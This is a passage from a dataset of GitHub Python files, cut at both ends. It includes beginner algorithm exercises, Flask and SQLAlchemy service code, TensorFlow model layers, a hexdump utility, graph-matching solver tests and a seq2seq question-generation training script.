#2\nprint(max_vowels_substring(\"leetcode\",3)) #2 
","repo_name":"Rahul-Bisht-123/Leetcode-75","sub_path":"problem15.py","file_name":"problem15.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"42535592079","text":"from sqlalchemy import Column, Integer, String, Boolean, ForeignKey\nfrom sqlalchemy.orm import relationship\nfrom base import Base\nfrom Tutor.TutorModel import Tutor\nfrom Tutee.TuteeModel import Tutee\n\n\nclass Problem(Base):\n __tablename__ = \"Problem\"\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column('title', String(60))\n description = Column('description', String(255))\n course_tag = Column('course_tag', String(50))\n status = Column(\"status\", Boolean)\n # tutee_id = Column(\"tutee_id\", Integer)\n # tutor_id = Column(\"tutor_id\", Integer)\n tutor_id = Column(Integer, ForeignKey(\n Tutor.id, ondelete='CASCADE'))\n tutee_id = Column(Integer, ForeignKey(\n Tutee.id, ondelete='CASCADE'))\n\n def __init__(self, title, description, course_tag, status, tutee_id):\n self.title = title\n self.description = description\n self.course_tag = course_tag\n self.status = status\n self.tutee_id = tutee_id\n","repo_name":"tutor-match00/tutor-match","sub_path":"src/Problem/ProblemModel.py","file_name":"ProblemModel.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70662160893","text":"from . import (\n Flask, \n current_app, \n ProductAuthorSchema, \n HTTPStatus, \n AuthorModel, \n AuthorsProducts, \n ProductModel,\n AuthorSchema\n)\nfrom flask import Blueprint, request, current_app, jsonify\nfrom http import HTTPStatus\n\nclass AuthorServices:\n \"\"\"\n Descrição de alto serviçes\n \"\"\"\n def __init__(self, session):\n self.session = session\n\n def get_all_authors(self):\n authors = AuthorModel.query.all()\n\n author_list = AuthorSchema(many=True).dump(authors) \n\n return {'authors': author_list}, HTTPStatus.OK \n\n\n\n\n def post_create_author(self, request):\n\n body = request.get_json()\n name = body.get('name')\n birthplace = body.get('birthplace')\n\n new_author = AuthorModel(name=name, birthplace=birthplace)\n\n self.session.add(new_author)\n try:\n self.session.commit()\n\n except Exception as exception:\n return AuthorSchema().author_exists(), HTTPStatus.NO_CONTENT\n \n return AuthorSchema().dump(new_author), HTTPStatus.OK \n\n def get_authors_by_id_service(self, authors_id):\n found_author = AuthorModel.query.get(authors_id)\n\n if found_author:\n response = AuthorSchema().dump(found_author), HTTPStatus.OK \n else:\n response = AuthorSchema().author_not_found(), HTTPStatus.UNPROCESSABLE_ENTITY \n\n return response\n\n\n def delete_author(self, product_id):\n session = current_app.db.session\n\n try:\n\n found_author = AuthorModel.query.get(product_id)\n\n session.delete(found_author)\n session.commit()\n\n return {}, HTTPStatus.NO_CONTENT\n\n except Exception:\n\n return AuthorSchema().author_not_deleted(), HTTPStatus.NOT_FOUND \n","repo_name":"diegopires1992/digitabook-Flask","sub_path":"app/services/authors_services.py","file_name":"authors_services.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4340935750","text":"# Page 65 Algo book\n# ReverseString\n# Implement a function reverseString(str) that, given a string, will return the string of the same length but\n# with 
characters reversed. Example: given \"creature\" , return \"erutaerc\" . Do not use the built-in\n# reverse() function!\ndef reverseStr(str):\n newStr = \"\"\n for i in reversed(str):\n newStr += i\n return newStr\nprint(reverseStr(\"trinh\"))\n","repo_name":"trinhgliedt/Algo_Practice","sub_path":"2020_11_19_reverse_string.py","file_name":"2020_11_19_reverse_string.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19798345561","text":"#5.7Hanoi.py\ncount = 0\ndef hanoi(n,src,dst,mid):#n为盘子数量,a为起始柱,b为中间柱,c为结束柱子\n global count\n if n == 1:\n print(\"{}:{}->{}\".format(1,src,dst))\n count += 1\n else:\n hanoi(n-1,src,mid,dst)\n print(\"{}:{}->{}\".format(n,src,dst))\n count += 1\n hanoi(n-1,mid,dst,src)\nhanoi(3,\"A\",\"B\",\"C\")\nprint(count)\n","repo_name":"viviensnow23/PythonLanguageProgramming_SongTian","sub_path":"5.7Hanoi.py","file_name":"5.7Hanoi.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72078825211","text":"import typing\n\nimport tensorflow as tf\n\nK = tf.keras.backend\n\ndef linear_layer(size: int,\n activation: str = None,\n use_time_distributed:bool = False,\n use_bias:bool = True) -> tf.keras.Model:\n '''Returns simple Keras linear layer.\n\n Args:\n size: Output size\n activation: Activation function to apply if required\n use_time_distributed: Whether to apply layer across time\n use_bias: Whether bias should be included in layer\n '''\n linear = tf.keras.layers.Dense(size, activation=activation, use_bias=use_bias)\n if use_time_distributed:\n linear = tf.keras.layers.TimeDistributed(linear)\n return linear\n\ndef apply_mlp(input: tf.Tensor,\n hidden_size: int,\n output_size: int,\n hidden_activation: str = 'tanh',\n output_activation: str = None,\n use_time_distributed: bool = False) -> tf.Tensor:\n '''Applies simple feed-forward network to an input.\n\n Args:\n input: MLP input\n hidden_size: Hidden state size\n output_size: Output size of MLP\n hidden_activation: Activation function to apply on input\n output_activation: Activation function to apply on output\n use_time_distributed: Whether to apply across time\n '''\n hidden_dense = tf.keras.layers.Dense(hidden_size, activation=hidden_activation)\n output_dense = tf.keras.layers.Dense(output_size, activation=output_activation)\n if use_time_distributed:\n hidden = tf.keras.layers.TimeDistributed(hidden_dense)(input)\n return tf.keras.layers.TimeDistributed(output_dense)(hidden)\n else:\n hidden = hidden_dense(input)\n return output_dense(hidden)\n\ndef apply_gating_layer(input: tf.Tensor,\n hidden_layer_size: int,\n dropout_rate: float = None,\n use_time_distributed: bool = True,\n activation: str = None) -> typing.Tuple[tf.Tensor, tf.Tensor]:\n '''Applies a Gated Linear Unit (GLU) to an input.\n\n Args:\n input: Input to gating layer\n hidden_layer_size: Dimension of GLU\n dropout_rate: Dropout rate to apply if any\n use_time_distributed: Whether to apply across time\n activation: Activation function to apply to the linear feature if necessary\n\n Return:\n Tuple of tensors for : (GLU output, gated_layer output)\n '''\n if dropout_rate is not None:\n input = tf.keras.layers.Dropout(dropout_rate)(input)\n\n activation_dense = tf.keras.layers.Dense(hidden_layer_size, activation=activation)\n gating_dense = tf.keras.layers.Dense(hidden_layer_size, activation='sigmoid')\n\n if use_time_distributed:\n 
activated_output = tf.keras.layers.TimeDistributed(activation_dense)(input)\n gated_output = tf.keras.layers.TimeDistributed(gating_dense)(input)\n else:\n activated_output = activation_dense(input)\n gated_output = tf.keras.layers.TimeDistributed(input)\n\n return tf.keras.layers.Multiply()([activated_output, gated_output]), gated_output\n\ndef apply_add_and_norm(inputs: typing.List[tf.Tensor]) -> tf.Tensor:\n '''Applies skip connection followed by layer normalization.\n\n Args:\n inputs: List of input to sum for skip connection\n \n Returns:\n Tensor output from layer.\n '''\n x = tf.keras.layers.Add()(inputs)\n return tf.keras.layers.LayerNormalization()(x)\n\ndef apply_gated_residual_network(input: tf.Tensor,\n hidden_layer_size: int,\n output_size: int = None,\n dropout_rate: float = None,\n use_time_distributed : bool = True,\n additional_context: tf.Tensor = None\n ) -> typing.Tuple[tf.Tensor, tf.Tensor]:\n '''Applies the gated residual network (GRN) as defined in paper.\n\n Args:\n input: Network input\n hidden_layer_size: Internal state size\n output_size: Size of output layer\n dropout_rat: Dropout rat if dropout is applied\n use_time_distributed: Whether to apply network across time dimension\n additional_context: Additional context vector to use if relevant\n \n Returns:\n Tuple of tensors for : (GRN output, GLU output)\n '''\n\n # Setup skip connection\n if output_size is None:\n output_size = hidden_layer_size\n skip = input\n else:\n linear = tf.keras.layers.Dense(output_size)\n if use_time_distributed:\n linear = tf.keras.layers.TimeDistributed(linear)\n skip = linear(input)\n \n\n # Apply feedforward network\n hidden = linear_layer(hidden_layer_size,\n activation=None,\n use_time_distributed=use_time_distributed\n )(input)\n if additional_context is not None:\n hidden = hidden + linear_layer(\n hidden_layer_size,\n activation=None,\n use_time_distributed=use_time_distributed\n )(additional_context)\n\n hidden = tf.keras.layers.Activation('elu')(hidden)\n hidden = linear_layer(\n hidden_layer_size,\n activation=None,\n use_time_distributed=use_time_distributed\n )(hidden)\n\n glu_output, gated_output = apply_gating_layer(\n hidden,\n output_size,\n dropout_rate=dropout_rate,\n use_time_distributed=use_time_distributed,\n activation=None)\n\n return apply_add_and_norm([skip, glu_output]), gated_output\n\ndef get_decoder_mask(self_attn_input: tf.Tensor) -> tf.Tensor:\n '''Returns causal mask to apply self-attention layer.\n\n Args:\n self_attn_input: Input to self attention layer to determine mask shape\n '''\n len_s = tf.shape(self_attn_input)[1]\n bs = tf.shape(self_attn_input)[:1]\n mask = K.cumsum(tf.eye(len_s, batch_shape=bs), 1)\n\n return mask\n\nclass ScaledDotProductAttention(object):\n '''Defines scaled dot product attention layer.\n\n Attributes:\n dropout: Dropout rate to use\n activation: Normalization function for scaled dot product attention\n (e.g. 
softmax by default)\n '''\n def __init__(self, attn_dropout=0.0):\n self.dropout = tf.keras.layers.Dropout(attn_dropout)\n self.activation = tf.keras.layers.Activation('softmax')\n\n def __call__(self,\n q: tf.Tensor,\n k: tf.Tensor,\n v: tf.Tensor, \n mask: tf.Tensor\n ) -> typing.Tuple[tf.Tensor, tf.Tensor]:\n '''Applies scaled dot product attention.\n\n Args:\n q: Queries\n k: Keys\n v: Values\n mask: Masking if required -- sets softmax to very large value\n\n Returns:\n Tuple of (layer outputs, attention weieghts)\n '''\n temper = tf.sqrt(tf.cast(tf.shape(k)[-1], tf.float32))\n attn = tf.keras.layers.Lambda(\n lambda x: K.batch_dot(x[0], x[1], axes=[2, 2]) / temper\n )([q, k])\n\n if mask is not None:\n mmask = tf.keras.layers.Lambda(\n lambda x: (-1e+9) * (1. - K.cast(x, 'float32'))\n )(mask)\n attn = tf.keras.layers.Add()([attn, mmask])\n attn = self.activation(attn)\n attn = self.dropout(attn)\n output = tf.keras.layers.Lambda(\n lambda x: K.batch_dot(x[0], x[1])\n )([attn, v])\n\n return output, attn\n\n\n\nif __name__ == '__main__':\n input = tf.keras.layers.Input((50, 3))\n x = apply_gated_residual_network(input, 30, 2)\n print(x)","repo_name":"palpalky/training-tensorflow","sub_path":"tft/libs/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4011499449","text":"#! /usr/bin/python3\ntry:\n # inpath = (\"ascii.txt\")\n inpath=input(\"Enter relative file path or absalute file path of input:\")\n outpath=input(\"Enter relative file path or absalute file path for output:\")\n\n if not outpath: outpath=(inpath+\"_Hexdump.txt\")\n infile = open(inpath,\"rb\")\n outfile = open(outpath,\"x\")\n\n bidump = infile.read()\n hexdump = bidump.hex()\n\n hc, off, pric, hexs, hexg, chag, chadump = 0, 0, 0, 0, \"\", \"\", \"\"\n\n while hc<=len(hexdump)+32:\n\n if not hexdump[hc:hc+2]:\n hexp, cha = \" \", \"\"\n else:\n hexp=str(hexdump[hc:hc+2])\n if 32<=int(hexp,16)<=126: cha=chr(int(hexp,16))\n else: cha=chr(46)\n\n hexg, chag, hexs, pric, hc = hexg+hexp, chag+cha, hexs+1, pric+1, hc+2\n\n if hexs==2:\n hexg, hexs = hexg+\" \", 0\n\n if pric==16:\n print(\"{:07x}\".format(off)+\"0:\\t\"+hexg+\"\\t\"+chag)\n outfile.write(\"{:07x}\".format(off)+\"0:\\t\"+hexg+\"\\t\"+chag+\"\\n\")\n pric, hexg, chag, off = 0, \"\", \"\", off+1\n\n infile.close()\n outfile.close()\n\nexcept FileNotFoundError:\n print(\"usage : program_name [infile] [outfile]\")\n # print(\"No such file or directory! 
\")","repo_name":"rushan-mike/NPD","sub_path":"A2/hex.py","file_name":"hex.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25350575563","text":"import sys\n\nimport random\n\nsys.path.insert(0, '.')\n\nimport numpy as np\nimport torch\nimport functools\nimport itertools\nfrom tqdm import tqdm\n\nfrom test_utils import *\nimport platform\n\nos_name = platform.system()\nbackends = ['pytorch', 'numpy', 'paddle', 'jittor'] if os_name == 'Linux' else ['pytorch', 'numpy', 'paddle']\nif os_name == 'Linux':\n import jittor as jt\n\n\n# The testing function\ndef _test_mgm_solver_on_isomorphic_graphs(num_graph, num_node, node_feat_dim, solver_func, mode, matrix_params, backends):\n if mode == 'lawler-qap':\n assert 'edge_aff_fn' in matrix_params\n assert 'node_aff_fn' in matrix_params\n if backends[0] != 'pytorch':\n backends.insert(0, 'pytorch') # force pytorch as the reference backend\n\n # Generate isomorphic graphs\n pygm.BACKEND = 'pytorch'\n # As, Fs are for kb-qap algorithms\n torch.manual_seed(1)\n As, X_gt, Fs = pygm.utils.generate_isomorphic_graphs(num_node, num_graph, node_feat_dim)\n # As_1, As_2, Fs_1, Fs_2 are for lawler-qap algorithms\n As_1, As_2, Fs_1, Fs_2 = [], [], [], []\n for i in range(num_graph):\n for j in range(num_graph):\n As_1.append(As[i])\n As_2.append(As[j])\n Fs_1.append(Fs[i])\n Fs_2.append(Fs[j])\n As_1 = torch.stack(As_1, dim=0)\n As_2 = torch.stack(As_2, dim=0)\n Fs_1 = torch.stack(Fs_1, dim=0)\n Fs_2 = torch.stack(Fs_2, dim=0)\n\n As, Fs, As_1, As_2, Fs_1, Fs_2, X_gt = data_to_numpy(As, Fs, As_1, As_2, Fs_1, Fs_2, X_gt)\n\n # call the solver\n total = 1\n for val in matrix_params.values():\n total *= len(val)\n for values in tqdm(itertools.product(*matrix_params.values()), total=total):\n aff_param_dict = {} # for affinity functions (supported keys: 'node_aff_fn', 'edge_aff_fn')\n solver_param_dict = {} # for solvers\n for k, v in zip(matrix_params.keys(), values):\n if k in ['node_aff_fn', 'edge_aff_fn']:\n aff_param_dict[k] = v\n else:\n if k == 'x0' and v is not None:\n # (1-matrix_params['x0']) matchings are correct, the others are randomly permuted\n x0_prob = v\n x0 = []\n for i, j in itertools.product(range(num_graph), repeat=2):\n if i == j or random.random() > v:\n x0.append(X_gt[i, j])\n else:\n _rand_perm = np.zeros((num_node, num_node), dtype=np.float32)\n _rand_perm[np.arange(num_node), np.random.permutation(num_node)] = 1\n x0.append(_rand_perm)\n x0 = np.stack(x0)\n v = x0.reshape((num_graph, num_graph, num_node, num_node))\n solver_param_dict[k] = v\n\n last_K = None\n last_X = None\n for working_backend in backends:\n pygm.BACKEND = working_backend\n if 'x0' in solver_param_dict and solver_param_dict['x0'] is not None:\n solver_param_dict['x0'] = pygm.utils.from_numpy(solver_param_dict['x0'])\n if 'ns' in solver_param_dict and solver_param_dict['ns'] is not None:\n solver_param_dict['ns'] = pygm.utils.from_numpy(solver_param_dict['ns'])\n if mode == 'lawler-qap':\n _As_1, _As_2, _Fs_1, _Fs_2, _X_gt = data_from_numpy(As_1, As_2, Fs_1, Fs_2, X_gt)\n _conn1, _edge1, _ne1 = pygm.utils.dense_to_sparse(_As_1)\n _conn2, _edge2, _ne2 = pygm.utils.dense_to_sparse(_As_2)\n\n _K = pygm.utils.build_aff_mat(_Fs_1, _edge1, _conn1, _Fs_2, _edge2, _conn2, None, _ne1, None, _ne2,\n **aff_param_dict)\n _K = _K.reshape((num_graph, num_graph, num_node ** 2, num_node ** 2))\n if last_K is not None:\n assert np.abs(pygm.utils.to_numpy(_K) - last_K).sum() < 0.1, 
\\\n f\"Incorrect affinity matrix for {working_backend}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n last_K = pygm.utils.to_numpy(_K)\n _X = solver_func(_K, **solver_param_dict)\n if last_X is not None:\n assert np.abs(pygm.utils.to_numpy(_X) - last_X).sum() < 1e-4, \\\n f\"Incorrect GM solution for {working_backend}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n last_X = pygm.utils.to_numpy(_X)\n\n accuracy = (pygm.utils.to_numpy(_X) * X_gt).sum() / X_gt.sum()\n if 'x0' not in solver_param_dict or solver_param_dict['x0'] is None:\n assert accuracy == 1, f\"GM is inaccurate for {working_backend}, accuracy={accuracy}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n else:\n assert accuracy >= 1 - x0_prob, f\"GM is inaccurate for {working_backend}, accuracy={accuracy}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n elif mode == 'kb-qap':\n Fs1 = np.expand_dims(Fs, 1).repeat(num_graph, axis=1).reshape(num_graph ** 2, num_node, node_feat_dim)\n Fs2 = np.expand_dims(Fs, 0).repeat(num_graph, axis=0).reshape(num_graph ** 2, num_node, node_feat_dim)\n _As, _Fs1, _Fs2, _X_gt = data_from_numpy(As, Fs1, Fs2, X_gt)\n node_aff_mat = aff_param_dict['node_aff_fn'](_Fs1, _Fs2)\n node_aff_mat = node_aff_mat.reshape((num_graph, num_graph, num_node, num_node))\n _X = solver_func(_As, node_aff_mat, **solver_param_dict)\n\n if last_X is not None:\n diff = 0\n for i, j in itertools.product(range(num_graph), repeat=2):\n diff += np.abs(pygm.utils.to_numpy(_X[i, j]) - last_X[i, j]).sum()\n # solve again\n if diff > 1e-4:\n _X = solver_func(_As, node_aff_mat, **solver_param_dict)\n diff = 0\n for i, j in itertools.product(range(num_graph), repeat=2):\n diff += np.abs(pygm.utils.to_numpy(_X[i, j]) - last_X[i, j]).sum()\n assert diff < 1e-4, \\\n f\"Incorrect GM solution for {working_backend}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n last_X = pygm.utils.to_numpy(_X)\n\n matched = 0\n total = 0\n for i, j in itertools.product(range(num_graph), repeat=2):\n if 'ns' in solver_param_dict and solver_param_dict['ns'] is not None:\n nsi = pygm.utils.to_numpy(solver_param_dict['ns'][i]).item()\n nsj = pygm.utils.to_numpy(solver_param_dict['ns'][j]).item()\n matched += (pygm.utils.to_numpy(_X[i, j]) * X_gt[i, j, :nsi, :nsj]).sum()\n total += X_gt[i, j, :nsi, :nsj].sum()\n else:\n matched += (pygm.utils.to_numpy(_X[i, j]) * X_gt[i, j]).sum()\n total += X_gt[i, j].sum()\n accuracy = matched / total\n assert accuracy == 1, f\"GM is inaccurate for {working_backend}, accuracy={accuracy}, \" \\\n f\"params: {';'.join([k + '=' + str(v) for k, v in aff_param_dict.items()])};\" \\\n f\"{';'.join([k + '=' + str(v) for k, v in solver_param_dict.items()])}\"\n else:\n raise ValueError(f'Unknown mode: {mode}')\n if 'x0' in solver_param_dict and solver_param_dict['x0'] is not None:\n solver_param_dict['x0'] = pygm.utils.to_numpy(solver_param_dict['x0'])\n if 'ns' in solver_param_dict and solver_param_dict['ns'] is not None:\n 
solver_param_dict['ns'] = pygm.utils.to_numpy(solver_param_dict['ns'])\n\n\ndef test_cao():\n num_nodes = 5\n num_graphs = 10\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.cao, 'lawler-qap', {\n 'mode': ['time', 'memory'],\n 'x0': [None, 0.2, 0.5],\n 'lambda_init': [0.1, 0.3],\n 'qap_solver': [functools.partial(pygm.ipfp, n1max=num_nodes, n2max=num_nodes), None],\n 'edge_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=1.), pygm.utils.inner_prod_aff_fn],\n 'node_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1), pygm.utils.inner_prod_aff_fn]\n }, backends)\n\n\ndef test_mgm_floyd():\n num_nodes = 5\n num_graphs = 10\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.mgm_floyd, 'lawler-qap', {\n 'mode': ['time', 'memory'],\n 'x0': [None, 0.2, 0.5],\n 'param_lambda': [0.1, 0.3],\n 'qap_solver': [functools.partial(pygm.ipfp, n1max=num_nodes, n2max=num_nodes), None],\n 'edge_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=1.), pygm.utils.inner_prod_aff_fn],\n 'node_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1), pygm.utils.inner_prod_aff_fn]\n }, backends)\n\n\ndef test_gamgm():\n num_nodes = 5\n num_graphs = 10\n # test without outliers\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.gamgm, 'kb-qap', {\n 'sk_init_tau': [0.5, 0.1],\n 'sk_min_tau': [0.1, 0.05],\n 'param_lambda': [0.1, 0.5],\n 'node_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1), pygm.utils.inner_prod_aff_fn],\n 'verbose': [True]\n }, backends)\n\n # test with outliers\n _test_mgm_solver_on_isomorphic_graphs(num_graphs, num_nodes, 10, pygm.gamgm, 'kb-qap', {\n 'sk_init_tau': [0.5],\n 'sk_gamma': [0.8],\n 'sk_min_tau': [0.1],\n 'param_lambda': [0.],\n 'node_aff_fn': [functools.partial(pygm.utils.gaussian_aff_fn, sigma=.1)],\n 'verbose': [True],\n 'n_univ': [10],\n 'outlier_thresh': [0., 0.1],\n 'ns': [np.array([num_nodes] * (num_graphs // 2) + [num_nodes - 1] * (num_graphs - num_graphs // 2))],\n }, backends)\n\n\ndef test_gamgm_backward():\n # Pytorch\n pygm.BACKEND = 'pytorch'\n torch.manual_seed(1)\n\n # Generate 10 isomorphic graphs\n graph_num = 10\n As, X_gt, Fs = pygm.utils.generate_isomorphic_graphs(node_num=4, graph_num=10, node_feat_dim=20)\n\n # Compute node-wise similarity by inner-product and Sinkhorn\n W = torch.matmul(Fs.unsqueeze(1), Fs.transpose(1, 2).unsqueeze(0))\n W = pygm.sinkhorn(W.reshape(graph_num ** 2, 4, 4)).reshape(graph_num, graph_num, 4, 4)\n\n # This function is differentiable by the black-box trick\n W.requires_grad_(True) # tell PyTorch to track the gradients\n X = pygm.gamgm(As, W)\n matched = 0\n for i, j in itertools.product(range(graph_num), repeat=2):\n matched += (X[i, j] * X_gt[i, j]).sum()\n acc = matched / X_gt.sum()\n\n # Backward pass via black-box trick\n acc.backward()\n assert torch.sum(W.grad != 0) > 0\n\n # Jittor\n if os_name == 'Linux':\n pygm.BACKEND = 'jittor'\n jt.set_global_seed(2)\n\n # Generate 10 isomorphic graphs\n graph_num = 10\n As, X_gt, Fs = pygm.utils.generate_isomorphic_graphs(node_num=4, graph_num=10, node_feat_dim=20)\n\n # Compute node-wise similarity by inner-product and Sinkhorn\n W = jt.matmul(Fs.unsqueeze(1), Fs.transpose(1, 2).unsqueeze(0))\n W = pygm.sinkhorn(W.reshape(graph_num ** 2, 4, 4)).reshape(graph_num, graph_num, 4, 4)\n\n # This function is differentiable by the black-box trick\n class Model(jt.nn.Module):\n def __init__(self, W):\n self.W = W\n\n def execute(self, As):\n X = pygm.gamgm(As, 
self.W)\n return X\n\n W.start_grad()\n model = Model(W)\n X = model(As)\n matched = 0\n for i, j in itertools.product(range(graph_num), repeat=2):\n matched += (X[i, j] * X_gt[i, j]).sum()\n acc = matched / X_gt.sum()\n\n # Backward pass via black-box trick\n optim = jt.nn.SGD(model.parameters(), lr=0.1)\n optim.step(acc)\n grad = W.opt_grad(optim)\n print(jt.sum(grad != 0))\n assert jt.sum(grad != 0) > 0\n\n\nif __name__ == '__main__':\n test_gamgm_backward()\n test_gamgm()\n test_mgm_floyd()\n test_cao()\n","repo_name":"Thinklab-SJTU/pygmtools","sub_path":"tests/test_multi_graph_solvers.py","file_name":"test_multi_graph_solvers.py","file_ext":"py","file_size_in_byte":13164,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"78"} +{"seq_id":"72034286971","text":"import json\nimport logging\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom tensorboardX import SummaryWriter\nfrom torch.nn.utils import clip_grad_norm_\nfrom torchtext import data\nfrom tqdm import tqdm\n\nimport config\nfrom dataprocessor import DataPreprocessor\nfrom model import Seq2Seq\nfrom utils import MetricReporter, dress_for_loss, correct_tokens, save_checkpoint\n\nlogging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S',\n level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"6\"\n\nprepro_params = {\n \"word_embedding_size\": config.word_embedding_size,\n \"question_embedding_size\": config.question_embedding_size,\n \"max_len_context\": config.max_len_context,\n \"max_len_question\": config.max_len_question,\n}\n\nhyper_params = {\n \"cuda\": config.cuda,\n \"batch_size\": config.batch_size,\n \"pretrained\": config.pretrained,\n \"learning_rate\": config.learning_rate,\n \"num_epochs\": config.num_epochs,\n \"start_decay_epoch\": config.start_decay_epoch,\n \"decay_rate\": config.decay_rate,\n \"drop_prob\": config.drop_prob,\n \"hidden_size\": config.hidden_size,\n \"num_layers\": config.num_layers\n # TO DO\n}\n\nexperiment_params = {\"preprocessing\": prepro_params, \"model\": hyper_params}\n# seting the cuda\ndevice = torch.device(\"cuda\" if hyper_params[\"cuda\"] else \"cpu\")\ntorch.manual_seed(35)\n\n# seting the a path to save the experiment log\nexperiment_path = \"./output/{}\".format(config.exp)\nif not os.path.exists(experiment_path):\n os.mkdir(experiment_path)\n\n# save the preprocesisng and model parameters used for this training experiment\nwith open(os.path.join(experiment_path, \"config_{}.json\".format(config.exp)), \"w\") as f:\n json.dump(experiment_params, f)\n\n# start TensorboardX writer\nwriter = SummaryWriter(experiment_path)\n\n# preprocess the data\ndp = DataPreprocessor()\ntrain_dataset, dev_dataset, vocabs = dp.load_data(os.path.join(config.out_file, \"train_dataset.pt\"),\n os.path.join(config.out_file, \"dev_dataset.pt\"),\n config.glove)\n\n# using the dataloader to feed data\ntrain_dataloader = data.BucketIterator(train_dataset,\n batch_size=hyper_params[\"batch_size\"],\n sort_key=lambda x: len(x.src),\n sort_within_batch=True,\n device=device,\n shuffle=True)\n\ndev_dataloader = data.BucketIterator(dev_dataset,\n batch_size=hyper_params[\"batch_size\"],\n sort_key=lambda x: len(x.src),\n sort_within_batch=True,\n device=device,\n shuffle=True)\n\nlogger.info(\"Length of training data loader is:{}\".format(len(train_dataloader)))\nlogger.info(\"Length of valid data loader is:{}\".format(len(dev_dataloader)))\n\n# TO DO\nmodel 
= Seq2Seq(src_vocab=vocabs[\"src_vocab\"],\n hidden_size=hyper_params[\"hidden_size\"],\n num_layers=hyper_params[\"num_layers\"],\n tgt_vocab=vocabs['tgt_vocab'],\n device=device,\n drop_out=hyper_params[\"drop_prob\"])\n\nmodel.to(device)\n# resume training if checkpoint\nif hyper_params[\"pretrained\"]:\n model.load_state_dict(torch.load(os.path.join(experiment_path, \"model.pkl\"))[\"state_dict\"])\n\n# set the loss function and reduce the mask loss\npadding_idx = vocabs['tgt_vocab'].stoi[\"<PAD>\"]\ncriterion = nn.NLLLoss(ignore_index=padding_idx, reduction=\"sum\")\noptimizer = torch.optim.SGD(model.parameters(), hyper_params[\"learning_rate\"])\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=list(range(hyper_params[\"start_decay_epoch\"],\n hyper_params[\"num_epochs\"] + 1)),\n gamma=hyper_params[\"decay_rate\"])\n\n# save the best model to continue learning\nif hyper_params[\"pretrained\"]:\n best_valid_loss = torch.load(os.path.join(experiment_path, \"model.pkl\"))[\"best_valid_loss\"]\n epoch_checkpoint = torch.load(os.path.join(experiment_path, \"model_last_checkpoint.pkl\"))[\"epoch\"]\n logger.info(\"Best validation loss obtained after {} epochs is: {}\".format(epoch_checkpoint, best_valid_loss))\nelse:\n best_valid_loss = 10000 # large number\n epoch_checkpoint = 1\n\n# create an object to report the different metrics\nmc = MetricReporter()\n\n# train the model\nlogging.info(\"Starting training...\")\nfor epoch in range(hyper_params[\"num_epochs\"]):\n logging.info(\"##### epoch {:2d}\".format(epoch))\n model.train()\n mc.train()\n print(\"lr is\", scheduler.get_lr())\n for i, batch in enumerate(tqdm(train_dataloader)):\n sentence, len_sentence, question, len_question = batch.src[0].to(device), batch.src[1].to(device), batch.tgt[\n 0].to(device), batch.tgt[1].to(device)\n optimizer.zero_grad()\n\n pred = model(sentence, len_sentence, question, len_question)\n pred = dress_for_loss(pred)\n # calculate Loss\n loss = criterion(pred.view(-1, pred.size(2)), question[:, 1:].contiguous().view(-1))\n\n # update the metrics\n num_non_padding, num_correct = correct_tokens(pred, question, padding_idx)\n mc.update_metrics(loss.item(), num_non_padding, num_correct)\n\n loss.backward()\n\n clip_grad_norm_(model.parameters(), 5.)\n\n optimizer.step()\n scheduler.step()\n\n # compute the loss, accuracy and perplexity for this epoch and push them to TensorboardX\n mc.report_metrics()\n writer.add_scalars(\"train\", {\"loss\": mc.list_train_loss[-1],\n \"accuracy\": mc.list_train_accuracy[-1],\n \"perplexity\": mc.list_train_perplexity[-1],\n \"epoch\": mc.epoch})\n\n model.eval()\n mc.eval()\n with torch.no_grad():\n for i, batch in enumerate(tqdm(dev_dataloader)):\n # load a batch of input sentence, sentence lengths and questions\n sentence, len_sentence, question, len_question = batch.src[0].to(device), 